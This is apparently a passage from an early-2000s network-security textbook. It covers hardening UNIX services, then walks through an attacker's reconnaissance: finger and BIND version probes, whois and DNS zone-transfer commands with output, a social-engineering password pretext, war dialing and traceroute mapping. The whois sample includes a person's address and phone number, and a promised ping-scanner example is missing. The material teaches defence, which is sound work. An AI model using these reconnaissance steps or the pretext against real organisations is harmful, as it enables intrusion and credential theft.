The UNIX bootp server provides bootp and DHCP services to network clients. DHCP and bootp clients can be serviced independently or in a mixed environment. The bootp service allows a client to dynamically obtain its IP address and subnet mask. DHCP supports these configuration settings and many others, such as default route, domain name, and so on. Most flavors of UNIX do not ship with a bootp server running.

DNS Server

The domain name server of choice for the UNIX platform is the Berkeley Internet Name Domain (BIND) server. BIND is the original, and still the most popular, utility used to exchange domain name information on the Internet. A BIND server can be configured to provide primary, secondary, or caching-only domain name services.

Most UNIX operating systems ship with a local DNS server running. BIND acts as a caching name server by default, unless you specifically configure the system to act as a primary or secondary. Even as a caching-only name server, BIND responds to queries on TCP and UDP port 53. BIND runs as its own separate process called named.

BIND is infamous for the ways in which hackers have exploited it over the years to gain access to UNIX systems. Verify that you have the latest version of BIND, and check with CERT (www.cert.org) for the latest security information regarding this critical network service.
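Because so many BIND exploits are version specific, attackers frequently ask a name server for its version string before choosing an attack. You can run the same check against your own servers. The following is a minimal sketch using the dig utility, where available; ns1.foobar.com is a hypothetical server name, and some BIND configurations can be set to hide or falsify this answer:

# Ask the name server to report its BIND version (CHAOS-class TXT query)
dig @ns1.foobar.com version.bind txt chaos

# If the answer section contains something like VERSION.BIND ... "8.2.3",
# compare that version against the current CERT advisories.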
Finger Server

Finger is one of those services that is typically overlooked but can provide a major security hole. UNIX provides both client and server Finger services, which allow you to finger an account by name in order to collect information about that user. A sample Finger request looks like this:

[cbrenton@thor cbrenton]$ finger root@loki.foobar.com
Login: root Name: root
Directory: /root Shell: /bin/bash
Last login Sun Aug 30 17:43 (EDT) on ttyp0 from 192.168.1.25
New mail received Mon Aug 31 02:41 1998 (EDT)
 Unread since Mon Aug 31 01:03 1998 (EDT)
No Plan.
[cbrenton@thor cbrenton]$

There are a couple of points worth noting about this output. First, I am running the Finger client from the system Thor in order to query a user on a remote machine named Loki; Finger is not just for local access but is designed for use over the network. Second, Finger will work on any user within the passwd file, including the root user.

I now know that root has not checked the system since Sunday, when the root user connected via a telnet session (ttyp0) from 192.168.1.25. If I were considering an attack on this system, I would now have some great information to work with:

• I can watch how often root checks the system, in order to maximize my chances of avoiding detection.
• I can monitor telnet sessions between Loki and 192.168.1.25 in order to try to capture the root logon password.
• Once I obtain root's password, I know I will not need physical access to the machine, because root is allowed to authenticate via telnet.

This is a hefty amount of information to gain by running a single command. If the user being queried is actually logged on, the output looks similar to the following:

[cbrenton@thor /etc]$ finger deb
Login: deb Name: Deb Tuttle
Directory: /home/deb Shell: /bin/bash
On since Mon Aug 31 13:15 (EDT) on ttyp3 from 192.168.1.32
 16 minutes 46 seconds idle
No mail.
No Plan.

As you can see, Deb has an active telnet session from 192.168.1.32 but has not done anything for the last 16 minutes and 46 seconds. If I have physical access to Deb's computer, I may take the long period of inactivity to mean that she is away from her desk. This might be a great opportunity to walk over and see if there is anything interesting in her files.

Finger runs as a process under inetd, which is discussed later in this chapter. Most flavors of UNIX have Finger enabled by default.

FTP Server

UNIX provides FTP services, including the ability to service anonymous FTP requests. When someone uses FTP to connect to the system with a valid logon name and password, she is dropped into her home directory and has her normal level of access to the file system. If, however, someone authenticates using the logon name anonymous, she is dropped into a subdirectory (typically /home/ftp) and is not allowed to navigate the file system above this point. As far as anonymous FTP users are concerned, /home/ftp is the root-level directory.

Note
Subdirectories set up under /home/ftp can give anonymous users read-only or read-write access to files. This is called anonymous FTP access, and it prevents people from gaining access to the complete file system without proper authentication.

FTP runs as a process under inetd. While most versions of UNIX ship with the FTP server enabled, not all support anonymous FTP access. The most popular version of FTP, wu-ftp, is also notorious for weaknesses that have allowed hackers to penetrate systems. As with BIND (above), make sure you have the latest secure version, and verify with CERT that there are no known issues with the version you are running.

HTTP Server

Many UNIX systems ship with the Apache Web server, the most popular Web server to date. Apache predominates among UNIX-based Web servers because it supports advanced features such as Java scripting and multihoming. Multihoming is the ability to host multiple domain names on the same Web server: Apache looks at the destination Web server address in each query and directs the query to the appropriate directory structure for that domain.
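As a concrete illustration of multihoming, here is a minimal sketch of what the relevant httpd.conf entries might look like on an Apache 1.3-era server. The domain names, address, and directory paths are hypothetical, and the exact directives vary between Apache releases:

# httpd.conf: serve two domains from one Apache server
NameVirtualHost 64.36.56.58

<VirtualHost 64.36.56.58>
    ServerName www.foobar.com
    DocumentRoot /home/httpd/foobar
</VirtualHost>

<VirtualHost 64.36.56.58>
    ServerName www.cameronhunt.com
    DocumentRoot /home/httpd/cameronhunt
</VirtualHost>

Each incoming request is matched against the ServerName entries, and Apache serves pages from the matching DocumentRoot.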
HTTP can be a particularly nasty process to leave running, because vulnerabilities have been found in some of the older, stock CGI scripts. If you are actively maintaining your server, you have probably updated many of these older scripts already. The situation to avoid is an HTTP process that has been loaded on the system and forgotten about. Web services run as their own separate process called httpd.

IMAP and POP3 Servers

UNIX supports remote mail retrieval using both POP3 and IMAP. POP3 is the older standard and is supported by most remote mail clients. IMAP has more features than POP3 but is only now becoming popular. IMAP has some known vulnerabilities, so make sure that you are running the most current version.

Most UNIX flavors ship with both POP3 and IMAP services active. Both run as processes under inetd.

Note
For more information on POP3 and IMAP, see Chapter 3.

login and exec

The login and exec daemons are referred to as the trusted hosts daemons, because they allow remote users to access the system without password authentication. The commands that use these daemons are rcp (copy a file to a remote system), rlogin (log on to a remote system), and rsh (execute a command on a remote system). Collectively, these are known as the R commands.

Trust is based on security equivalency. When one system trusts another, it believes that all users will be properly authenticated and that an attack will never originate from the trusted system. Unfortunately, this can create a domino effect: all an attacker needs to do is compromise one UNIX machine and then use the trusted host equivalency to compromise additional systems.

Trusted hosts are determined by the contents of the /etc/hosts.equiv file. This file contains a list of trusted systems, as in the following example:

loki.foobar.com
skylar.foobar.com
pheonix.foobar.com

If this hosts.equiv file is located on the system named thor.foobar.com, then Thor will accept login and exec service requests from each of these systems without requiring password authentication. If any other system attempts to gain access, the connection request is rejected.

Warning
It is far too easy to exploit the minor level of security provided by the R commands. An attacker can launch a spoof attack, or possibly corrupt DNS, in order to exploit the lack of password security. Both login and exec run as daemons under inetd. It is highly recommended that you disable these services. Using ssh (secure shell) provides the same functionality, but with authenticated and encrypted communications.

Mail Server

Most flavors of UNIX include Sendmail for processing SMTP traffic. While there are a few other SMTP programs available for UNIX, Sendmail is by far the most popular. At the time of this writing, the current version of Sendmail is 8.11.2. Older versions of Sendmail (especially versions prior to 8.0) have many known exploits; if you are running an older version, you should seriously consider updating.

Warning
Unfortunately, many UNIX vendors do not stay up to date on Sendmail releases, so it is entirely possible that you will install a new OS version only to find that its Sendmail is one or two years old.

Most versions of UNIX ship with Sendmail installed and running. Sendmail runs as its own separate process.
The name of the daemon is sendmail.

News Server

The most popular UNIX news server is the InterNetNews daemon (INND). When a UNIX news server is provided with an appropriate feed, remote users can connect to the server to read and post news articles. If no feed is available, the server can still be used for intranet discussion groups.

News is not included with most UNIX packages, mostly because of the amount of resources the typical news server consumes. Besides gobs of disk space (8GB to store a few weeks' worth of articles is not uncommon), an active news server will bring a low-grade processor to its knees.

Tip
If you decide to run news, it is a good idea to dedicate a system to the task.

NFS Server

UNIX can use NFS to export portions of the server's file system to NFS clients, or to act as an NFS client itself and mount remote file systems. The functionality is similar to NetWare (where you would map a drive letter to a section of the remote file system) or to NT Server (where you would map to a share). The difference is that a remote NFS file system can be mounted at any point in the UNIX client's file system.

Most flavors of UNIX ship with NFS version 2. This version is fairly insecure, mostly because it uses UDP as a transport. NFS version 3 supports TCP, which makes the protocol easier to control with static packet filtering. Many UNIX operating systems ship with the NFS server active, but unless you specifically configure it otherwise, no file systems are exported by default.

Using NFS is still considered risky, because packet filtering is easily exploited and overcome by a skilled attacker. Use NFS only if necessary, and then only behind a firewall.

SAMBA

SAMBA is a suite of tools that allows a UNIX machine to act as a Server Message Block (SMB) client or server. SMB is the same protocol used by Windows systems, which means that a UNIX system running SAMBA can participate in a Windows workgroup or domain (although it cannot act as a PDC or BDC). This allows the UNIX machine to share files or printers with Windows systems.

Most UNIX flavors do not ship with SAMBA pre-installed; the exception is Linux. SAMBA is available for free, however, and supports many flavors of UNIX. SAMBA runs its own set of daemons, smbd and nmbd, which are not controlled by inetd.

Talk

UNIX supports Talk, which is similar to Internet Relay Chat (IRC). Talk does not require a dedicated server, because a session is created directly between two UNIX machines. You establish a connection by typing talk user@host.domain.

The recipient of a Talk request accepts or rejects the connection. Once a connection is established, the screen is split so that both users can type messages simultaneously. Most flavors of UNIX ship with Talk installed and activated. Talk runs as a process under inetd.

Because modern security philosophy is minimalist, activate Talk only if it is absolutely necessary. Talk-like clients, which avoid activating any daemons, can provide the same communication capability; examples include IRC, ICQ, and America Online's Instant Messenger (AIM).

Time Server

UNIX can use the Network Time Protocol (NTP) to both send and receive time synchronization updates.
Typically, one system on the network is set up as a time reference server. This server syncs its time with one of the many publicly available time servers on the Internet. Other systems on the network then check with the reference time server to ensure that their own system time remains accurate.

Most flavors of UNIX ship with a time service installed and active: the simple time service shown in the inetd.conf listing later in this chapter runs as a process under inetd, while full NTP implementations typically run as their own daemon. NTP version 3, the most current, supports cryptographic authentication of reference servers, preventing unknown servers from posing as reference servers.

Note
Although there are no known direct exploits against NTP, an attacker may attempt to propagate bogus time information if you have a security policy that is looser during certain parts of the day.

Telnet Server

UNIX can accept telnet requests in order to provide remote console access to the server. Clients connecting to the system through telnet have the same abilities they would have sitting in front of the server console.

Note
This is a powerful feature, so you should plan to take additional steps to limit who has telnet access to your UNIX machines.

Telnet is supported by all modern versions of UNIX, and the telnet server is active by default. Telnet runs as a process under inetd.

Additional steps for securing telnet include limiting the administrative functions that can be performed in a telnet session (such as logging in as root) and replacing telnet with ssh (secure shell), which provides the same functionality but encrypts the communication. (With telnet, the username and password are sent over the network media in clear text.)

inetd

inetd is the super server responsible for monitoring service ports on a UNIX system. (Starting with Red Hat Linux 7, inetd has been replaced by xinetd, an improved version that provides better security and management.) inetd is also responsible for launching the appropriate daemon when a service request is received. inetd uses two files to determine how to handle service requests:

services Identifies the service associated with each port

inetd.conf Identifies the daemon associated with each service

The Services File

The services file was discussed at length in Chapter 3, so I will only mention it briefly here. The services file contains a single-line entry for each port that inetd is expected to monitor. For example, the entry for telnet appears as follows:

telnet 23/tcp #Provide remote terminal access

This tells inetd that any request received on port 23 using TCP as a transport is attempting to access the telnet service. Once inetd identifies that a remote user is trying to access telnet, it references the inetd.conf file to determine how to handle the request.

inetd.conf

The inetd.conf file tells inetd which daemon to launch for a given service request. Here is an example of an inetd.conf file:

# These are standard services.
#
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
gopher stream tcp nowait root /usr/sbin/tcpd gn
#smtp stream tcp nowait root /usr/bin/smtpd smtpd
#nntp stream tcp nowait root /usr/sbin/tcpd in.nntpd
#
# Shell, login, exec and talk are BSD protocols.
#
shell stream tcp nowait root /usr/sbin/tcpd in.rshd
login stream tcp nowait root /usr/sbin/tcpd in.rlogind
#exec stream tcp nowait root /usr/sbin/tcpd in.rexecd
talk dgram udp wait root /usr/sbin/tcpd in.talkd
ntalk dgram udp wait root /usr/sbin/tcpd in.ntalkd
#dtalk stream tcp wait nobody /usr/sbin/tcpd in.dtalkd
#
# Pop and imap mail services et al
#
pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d
pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d
imap stream tcp nowait root /usr/sbin/tcpd imapd
#
# Tftp service is provided primarily for booting. Most sites
# run this only on machines acting as "boot servers." Do not uncomment
# this unless you *need* it.
#
#tftp dgram udp wait root /usr/sbin/tcpd in.tftpd
#bootps dgram udp wait root /usr/sbin/tcpd bootpd
#
# Finger, systat and netstat give out user information which may be
# valuable to potential "system crackers." Many sites choose to disable
# some or all of these services to improve security.
#
# cfinger is for GNU finger, which is currently not in use in RHS Linux
#
finger stream tcp nowait root /usr/sbin/tcpd in.fingerd
#cfinger stream tcp nowait root /usr/sbin/tcpd in.cfingerd
#systat stream tcp nowait guest /usr/sbin/tcpd /bin/ps -auwwx
#netstat stream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f inet
#
# Time service is used for clock synchronization.
#
time stream tcp nowait nobody /usr/sbin/tcpd in.timed
time dgram udp wait nobody /usr/sbin/tcpd in.timed
#
# Authentication
#
auth stream tcp nowait nobody /usr/sbin/in.identd in.identd -l -e -o
#
# End of inetd.conf

From left to right, each line entry includes:

• The service, as identified in the services file
• The socket type
• The transport
• The flags to use at initialization
• The user account that provides privileges for this daemon
• The name of the daemon, including any required switches

Once inetd has checked the services file and identified a service request as looking for telnet, it references the following line in the inetd.conf file:

telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

This tells inetd to go to the /usr/sbin directory and run the tcpd daemon with in.telnetd as an argument, using root-level privileges.

Warning
Be very careful with any service that runs under root-level privileges, because such services are prime targets for attack. An attacker who can compromise a root-level service may be able to steal information or install a back door to provide future access. This is why many services run as guest or nobody: compromising such a service provides very little access.

Disabling Services Called by inetd

One of the best ways to secure a UNIX system is to shut down all unneeded services. The more services running on the system, the easier it is for an attacker to find an exploit that allows access to the system.

Tip
Disabling unneeded services is also an easy way to boost system performance. The fewer processes you have enabled, the more resources are available for the services you do need to run.

To disable a service running under inetd, simply add a pound sign (#) to the beginning of its entry in the inetd.conf file.
For example, to disable telnet access to the system, change the entry to

#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

Once you have commented out all the services you do not wish to run, you need to restart the inetd process. Do this by identifying the process ID used by inetd and sending that process a restart signal. To find the process ID, type the following:

[root@thor /etc]# ps -ax|grep inetd
 151 ? SW 0:00 (inetd)
 7177 p0 S 0:00 grep inetd
[root@thor /etc]# kill -HUP 151
[root@thor /etc]#

The ps -ax portion of the first command lists all running processes. Instead of letting this output scroll past the top of the screen, we have piped ( | ) it to the grep command. We are telling grep to filter the output produced by ps -ax and show only the entries that include the keyword inetd. The first entry (process ID 151) is the actual inetd process running on the UNIX system. The second listing (process ID 7177) is our grep command performing its search.

Now that you know the process ID used by inetd, you can signal the process to restart. This is done with the second command: kill -HUP 151.

Note
Remember that case is important in UNIX, so you must type the command exactly.

Once you have restarted inetd, it will ignore service requests for the entries you commented out. You can test this by pointing telnet at the service port in question. For example,

telnet thor 110

creates a connection to the POP3 service port (110). If you have commented out the POP3 service, you should immediately receive a Connection Refused error.

Working with Other Services

Not all services are called by inetd. BIND, Sendmail, and SAMBA, for example, each commonly run as their own processes. HTTP is another service that commonly runs as its own process. This is done for performance reasons: the service can respond to requests faster if it does not have to wait for inetd to wake it up. On an extremely busy system, this can provide a noticeable improvement in performance.

Disabling Stand-Alone Services

To disable a stand-alone service, you need to disable the initialization of that service during system startup. Many services look for key files before they initialize; if the key file is not found, the service does not start. This is done to prevent errors. For example, BIND looks for the file /etc/named.boot during startup, and Sendmail checks for a file named sendmail.cf before it will initialize. If these files are not found, the process fails to start.

One method of preventing a process from starting, therefore, is to delete or rename its key file. For example, the command

mv named.boot named.boot.old

renames the named.boot file to named.boot.old. This prevents BIND from locating its key file, causing initialization to fail.

You can also disable a stand-alone service by renaming its initialization script or by commenting the script out. In the Linux world, all process initialization scripts are stored under /etc/rc.d/init.d, and these initialization files bear the names of the processes they start. For example, the Sendmail initialization script is named sendmail.init.
By renaming this file to sendmail.init.old, you can prevent Sendmail from being called during system initialization.

Once you have changed your initialization files so that all unnecessary daemons are prevented from starting, you can restart the system, or simply kill the currently running process. To kill a running process, use the ps and grep commands as we did in the inetd example, then issue the kill command without any switches. The output of these commands would appear similar to this:

[root@thor /root]# ps -ax|grep sendmail
 187 ? S 0:00 (sendmail)
 258 p0 S 0:00 grep sendmail
[root@thor /root]# kill 187
[root@thor /root]# ps -ax|grep sendmail
 263 p0 S 0:00 grep sendmail
[root@thor /root]#

Once you have reduced the number of services running on your UNIX system, you can use TCP Wrapper to limit who can access the services that remain.

TCP Wrapper

TCP Wrapper allows you to specify which hosts are allowed to access each service managed by inetd. Most modern versions of UNIX ship with TCP Wrapper pre-installed.

Note
Despite its name, TCP Wrapper can be used with services that require either TCP or UDP as a transport.

TCP Wrapper is activated by having inetd call the TCP Wrapper daemon instead of the actual service daemon. Refer back to our telnet example:

telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

inetd is actually calling the TCP Wrapper daemon (tcpd), not the telnet daemon (in.telnetd). Once tcpd is called, the service request is compared to a set of access rules. If the connection is acceptable, it is allowed to pass through to the in.telnetd daemon. If the connection request fails access control, the connection is rejected.

Access control is managed using two files:

hosts.allow Defines which systems are permitted access to each service

hosts.deny Defines which service requests will be rejected

When verifying access from a remote system, tcpd first checks the hosts.allow file. If no matching entry is found, tcpd then checks the hosts.deny file. The syntax of both files is as follows:

<service list>: <host list>

Valid services are limited to those managed by inetd. Valid hosts can be listed by host name, domain, or IP address. For example, consider the following output:

[root@thor /etc]# cat hosts.allow
pop-3, imap: ALL
ftp: .foobar.com
telnet: 192.168.1.
finger: 192.168.1.25
[root@thor /etc]# cat hosts.deny
ALL: ALL

The hosts.allow file states that all hosts with connectivity to the system are permitted to access the POP3 and IMAP services. FTP, however, is limited to hosts within the foobar.com domain. We have also limited telnet access to source IP addresses on the 192.168.1.0 network. Finally, only the host at IP address 192.168.1.25 is allowed to finger the system.

The hosts.deny entry allows us to define the security stance "that which is not expressly permitted is denied." If a service request is received and no match is found in the hosts.allow file, this catchall rule specifies that the remote system is not allowed access to our UNIX server.

TCP Wrapper is an excellent way to fine-tune access to your system. Even if all your UNIX systems sit behind a firewall, it cannot hurt to take preventive measures to lock them down further. This helps to ensure that anyone who manages to sneak past the firewall will still be denied access to your UNIX systems.
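Before relying on your access rules, it is worth testing them. Most TCP Wrapper distributions include two utilities for exactly this purpose; the daemon and host names below are this chapter's examples, and the availability of these tools varies by platform:

# Check hosts.allow and hosts.deny for syntax errors and for
# references to daemons that inetd does not actually run
tcpdchk -v

# Predict how tcpd would treat a telnet request from 192.168.1.25
tcpdmatch in.telnetd 192.168.1.25

# Predict how tcpd would treat a finger request from an outside host
tcpdmatch in.fingerd badguy.example.com

Running these checks after every rule change helps catch a typo before an attacker does.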
Summary

In this chapter you saw how to go about locking down your UNIX system (or UNIX-like system, such as Linux or FreeBSD). We discussed file permissions and how they can be tuned to restrict access to sensitive files. You also looked at how the UNIX system handles authentication and why it is so important to lock down the root user account. Finally, you looked at IP services and how you can limit which hosts have access to them.

The next chapter will look at some common exploits, describing how each vulnerability is exploited and what you can do to protect your network.

Chapter 16: The Anatomy of an Attack

In this chapter, we will look at some of the common tricks and tools an attacker may use in order to compromise your assets. This is not intended to be a how-to on attacking a network. Rather, it is intended to show you, the network administrator, how an attacker is likely to go about finding the points of vulnerability within your network. Here, we will focus on how you can identify the signs of an attack and what you can do to prevent it.

The initial discussions assume that the attacker is someone outside your network perimeter who is trying to break in. This is done simply to show what additional steps an attacker must take when working with limited information. A regular user on your network, who already has an insider's view, would be able to skip many of these steps. As you saw in Chapter 1, an overwhelming majority of network attacks originate from inside the network. This means that the precautionary steps you take to secure your network resources cannot concentrate solely on the network perimeter.

Collecting Information

Woolly Attacker has seen one of your TV ads and decided that your political views do not match his own. He decides his best recourse is to attack your network. The question is, where to begin? At this point, Woolly does not even know your domain name. In order to attack your network, he has to do some investigative work.

The whois Command

The first thing Woolly can try is a whois query at the InterNIC. The InterNIC maintains a publicly accessible database of all registered domain names, which can be searched using the whois utility. By querying for the name of the organization, Woolly can find out whether it has a registered domain name. For example, searching for an organization named CameronHunt.com would produce something like the following:

[granite:~]$ whois CameronHunt.com
Registrant:
Cameron Hunt (CAMERONHUNT-DOM)
   392 E. 12300 So. Ste A.
   Draper, UT 84020
   US

   Domain Name: CAMERONHUNT.COM

   Administrative Contact, Technical Contact, Billing Contact:
      Hunt, Cameron (CHL150) cam@cameronhunt.com
      10312 Bay Club Ct.
      Tampa, FL 33607
      (813) 207-0363

   Record last updated on 05-Apr-2000.
   Record expires on 19-Jan-2002.
   Record created on 19-Jan-2000.
   Database last updated on 12-Feb-2001 16:21:38 EST.

   Domain servers in listed order:

   DNS.CAMERONHUNT.COM 64.36.56.58
   DNS.COPPERKNOB.COM 64.36.56.59

By running this simple command, we now have some interesting information to work with.
So far we know:

• The organization's domain name
• The organization's location
• The organization's administrative contact
• The administrator's phone number
• A valid subnet address within the organization (64.36.56.0)

Domain Name

The organization's domain name is important because it will be used to collect further information. Any host or user associated with this organization will also be associated with this domain name. This gives Woolly a keyword to use when forming future queries. In the next section, we will use the domain name discovered here to produce additional information.

Physical Location

Woolly also knows where this organization is located. If he is truly intent on damaging this network or stealing information, he may now attempt to apply for a temporary job or, even better, offer his consulting services. This could win him a certain level of access to network resources, letting him continue his investigation or possibly install backdoor access into the network. While this approach requires quite a bit of legwork, the easiest way to breach a network perimeter is to be invited inside it.

The address also tells Woolly where to go if he wishes to do a bit of dumpster diving. Dumpster diving is rummaging through an organization's trash in an effort to find company-private information, such as valid account names, passwords, or even financial information. Over the years, this process has been simplified, because many organizations now separate their paper trash from the rest for recycling. This makes finding useful information far easier, and a lot cleaner.

Administrative Contact

The administrative contact is typically the individual responsible for maintaining the organization's network. In some cases, a technical contact, subordinate to the administrative contact, is listed as well. This can be extremely useful information if Woolly wants to attempt a social engineering attack. For example, he could now call an end user and state, "Hi, I'm Sean, who has just been hired on the help desk. Tom Smith asked me to call you because there is a problem with your account on one of the servers. What's your password?" If Woolly gets lucky, he will end up with a valid logon name and password, providing at least minimal access to network resources. This minimal access is all he needs to get a foothold and go after full administrator access.

Phone Numbers

Phone numbers may seem like a strange piece of information to go after, but they can be quite useful. Most organizations use a phone service called Direct Inward Dial (DID). DID allows someone to call a seven-digit phone number and directly reach the desk of an employee without going through an operator. The numbers are usually issued in blocks; for example, 555-0500 through 555-0699 may be a block of DID numbers assigned to a specific organization. DID makes it very easy for an attacker to discover every phone number your organization uses.

So Woolly may try calling phone numbers that are just a few digits off from the listed contact. This may allow him to reach other employees on whom to attempt his previously described social engineering attack. Woolly may also set up a war dialer to test consecutive phone numbers.
A war dialer is simply a piece of software that dials a series of phone numbers and identifies which of those numbers are answered by a computer. Woolly can then review the list and attempt to infiltrate every number that a computer answered. If his social engineering attack was successful, he even has a valid account to try.

Valid Subnet

One of the last pieces of information produced by the whois command is an IP address entry for DNS.CAMERONHUNT.COM. Since this host is part of our target domain, we can assume that the subnet it sits on is also part of the same domain. Woolly does not know whether the host is inside or outside the firewall, but he now knows one valid subnet to use once he decides to launch his attack.

The nslookup Command

Now that the whois command has given Woolly a starting reference point, he can use the nslookup command to collect even more information. The nslookup command allows you to query DNS servers in order to collect host and IP address information. If Woolly wishes to attack the network, he must find out which hosts are available as targets. The nslookup utility does an excellent job of supplying this information.

What a War Dialer Can Find

It is not uncommon for organizations to overlook security on their dial-in devices. For example, in the spring of 1998, security researcher Peter Shipley used a war dialer to systematically call phone numbers within the San Francisco Bay area. He found multiple systems that granted full access without any type of authentication, including:

• A firewall that protected a financial services organization
• A hospital system that allowed patient records to be viewed or modified
• A fire department system allowing fire engines to be dispatched

While these are extreme examples, it is not uncommon for organizations to allow their users to have modems on their desktops. This, in effect, puts each employee in charge of security for that modem line, something many employees may not be qualified to handle.

When Woolly launches the nslookup utility, he is informed of the current DNS server that nslookup will use, as shown in the following output:

[granite:~]$ nslookup
Default Server: granite.sover.net
Address: 209.198.87.33
>

This output tells us that nslookup will use the server granite.sover.net when making DNS queries. Since Woolly wants to find out information about CAMERONHUNT.COM, he changes the default DNS server to one of the two systems listed in the whois output:

> server DNS.CAMERONHUNT.COM
Default Server: DNS.CAMERONHUNT.COM
Address: 64.36.56.58

>

The nslookup utility is now pointed at DNS, one of CameronHunt's name servers, and all queries will be directed to this system instead of granite. The first thing Woolly will try is a zone transfer, which would allow him to collect all host and IP address information with a single command:

> ls -d CAMERONHUNT.COM > hosts.lst
[DNS.CAMERONHUNT.COM]
Received 20 answers (0 records).
> exit

The first command attempts to get the DNS server to list all valid host information for the CAMERONHUNT.COM domain and writes the output to a file called hosts.lst.
The fact that he received 20 answers to his query tells Woolly that the command was successful; he now has a valid list of all hosts registered with this DNS server. Newer DNS systems (such as Windows 2000 DNS, which stores its zone files within Active Directory) will refuse such a request unless the requester is authorized, but many administrators never activate this simple security procedure, as security audits and the large number of DNS hacks (even at Microsoft) have demonstrated. At this point, Woolly exits the nslookup utility, because he was able to gather all the information he required quickly.

Tip
You can limit who can perform zone transfers from your name servers by using the xfrnets directive (if your DNS system supports the named.boot file). This directive is placed in the named.boot file and precedes a list of IP addresses identifying the only systems allowed to perform zone transfers with the name server.

Had Woolly received a "Can't list domain" error message, it would have been an indication that zone transfers from this name server are limited to specific hosts. Woolly would then be forced to systematically try common host names such as mail, ftp, www, and so on in order to discover additional systems within the CameronHunt network. There is no guarantee that he could identify every valid name this way, because the process becomes a guessing game. The zone transfer was successful, however, as the contents of the hosts.lst file show:

[DNS.CAMERONHUNT.COM]
$ORIGIN CAMERONHUNT.COM.
@ 1H IN SOA DNS postmaster (
        5    ; serial
        1H   ; refresh
        10M  ; retry
        1D   ; expiry
        1H ) ; minimum
    1H IN NS dns
    1H IN NS 206.79.230.10
    1H IN MX 5 mail
cam 1H IN CNAME mail
ftp 1H IN CNAME web
web 1H IN A 64.36.56.58
honeypot 1H IN A 64.36.55.57
www 1H IN CNAME web

This file has produced some very useful information. Woolly may now have two valid IP subnets at which to direct his attacks instead of just one (64.36.56.0 and 64.36.55.0). The 206.79.230.0 subnet is not a target, because the whois information lists that host as part of another domain (exodus.net).

Woolly also knows from the MX record that the host named mail is the mail system for the domain. In addition, he knows that it is the only mail system, so if he can disable this one host, he can interrupt mail services for the entire domain. Finally, this file shows that the Web server is also acting as the FTP server. It may be possible for Woolly to use the FTP service to compromise the Web server and corrupt Web pages, or to reach potentially sensitive information.
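On systems that include the dig utility, the same zone-transfer test can be run from the command line and scripted. Here is a minimal sketch using the chapter's example domain; as noted above, a properly restricted server will refuse the request:

# Attempt a full zone transfer from the target's name server
dig @DNS.CAMERONHUNT.COM CAMERONHUNT.COM axfr > hosts.lst

# A refused transfer typically returns "Transfer failed." or no records,
# which tells you the server restricts zone transfers to specific hosts.

Running this against your own name servers from an outside host is a quick way to verify that your transfer restrictions actually work.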
Search Engines

Search engines can be an excellent method of collecting additional information about an organization's internal network. If you have not done so already, try searching for hits on your organization's domain name. You will be amazed at how much information accumulates once an organization has been online for a while. This can include mail messages, newsgroup posts, and pages from internal Web servers (if they are visible from the Internet).

For example, look closely at Figure 16.1. The domain bofh.org has a mail relay named thor.bofh.org that is responsible for sending and receiving all e-mail. As far as the outside world is concerned, Thor is bofh.org's only mail system. If you look closely at this mail header, however, you will see that there is another mail system hiding behind Thor, named mailgw.bofh.org.

Figure 16.1: A search engine hit that displays an e-mail header

This mail header reveals quite a bit of information that could be used to attack the internal network:

• The mail relay Thor is a UNIX machine running Sendmail (version 8.7.1 at the time of this posting).
• The mail relay is on IP subnet 201.15.48.0.
• There is a second mail system hiding behind Thor, named mailgw.bofh.org.
• The mailgw host is on IP subnet 201.15.50.0.
• The mailgw host is an NT server running Postal Union's gateway software.
• The internal mail system is Microsoft Mail.

Not bad for a single search engine hit.

Tip
The way to avoid this problem is to have the mail relay strip all previous header information from outbound mail. This makes it appear as though all mail originates from the relay itself, preventing information about your internal network from leaking out.

Probing the Network

Now that Woolly has collected some general information about the target, it is time for him to begin probing and prodding to see what other systems or services might be available on the network. Woolly would do this even if he has already found his way inside the firewall through some other means, such as a contract job or dial-in access. Probing gives an attacker a road map of the network, as well as a list of available services.

The traceroute Command

The traceroute command is used to trace the network path from one host to another. This is useful when you wish to document the network segments between two hosts. An example of the output created by traceroute is shown in Figure 16.2.

Figure 16.2: Output from the traceroute command

Note
In the Windows world, the command name is truncated to tracert in order to accommodate an eight-character filename.

The output in Figure 16.2 shows the host name and IP address of each router that must be crossed between the source and destination systems. The three time columns in each row show how long it took to cross the network segment leading to that hop.

Just before reaching DNS, the trace crossed a few network segments on powerinternet.net. Notice also that several hops timed out and failed to respond to the traceroute query. This could be because of a slow link speed, or possibly because the device is filtering out these requests.

Returning to our nslookup information, Woolly still needs to verify whether the honeypot address corresponds to a live host within the CameronHunt.com domain. To find out, he can rerun the traceroute command, this time using honeypot.CAMERONHUNT.COM as the target system. The output of this test is shown in Figure 16.3. As you can see, the trace terminates on an unknown network. This verifies that honeypot is a host that does not exist, and that Woolly has only the 64.36.56.0 subnet to use when targeting his attacks.

Figure 16.3: Woolly verifies that honeypot isn't a valid host.
Note
If Woolly had taken a contract job with CameronHunt.com or found his way into the network by some other means, the traceroute command could produce even more information; it would document each of the internal IP subnets, as well as the routers connecting them. By choosing a few selective hosts, Woolly could generate a full network diagram.

Host and Service Scanning

Host and service scanning allows you to document which systems are active on the network and which ports are open on each system. This is the next step in identifying which systems may be vulnerable to attack. The steps to perform are:

1. Find every system on the network.
2. Find every service running on each system.
3. Find out which exploits each service is vulnerable to.

These steps can be performed individually, or you can locate a tool that performs all of them at once. For the sake of completeness, we will look at these steps one at a time.

Ping Scanning

A Ping scanner simply sends an ICMP echo request to each sequential IP address on a subnet and waits for a reply. If a reply is received, the scanner assumes that there is an active host at that address. The scanner then logs the systems that respond, and possibly attempts to resolve each IP address to a host name. A simple batch or script file can be used to create a homespun Ping scanner (a minimal example follows at the end of this section). You can also find a number of graphical utilities, such as WildPackets' (formerly AG Group) iNetTools, shown in Figure 16.4.

Figure 16.4: The Ping scanner included in the iNetTools utility

Tip
An additional feature of the iNetTools utility is that if it cannot resolve an IP address to a DNS host name, it will attempt to look up the system's NetBIOS name instead. This is helpful when you are scanning a network with many Windows desktop systems that may not have entries on the DNS server.
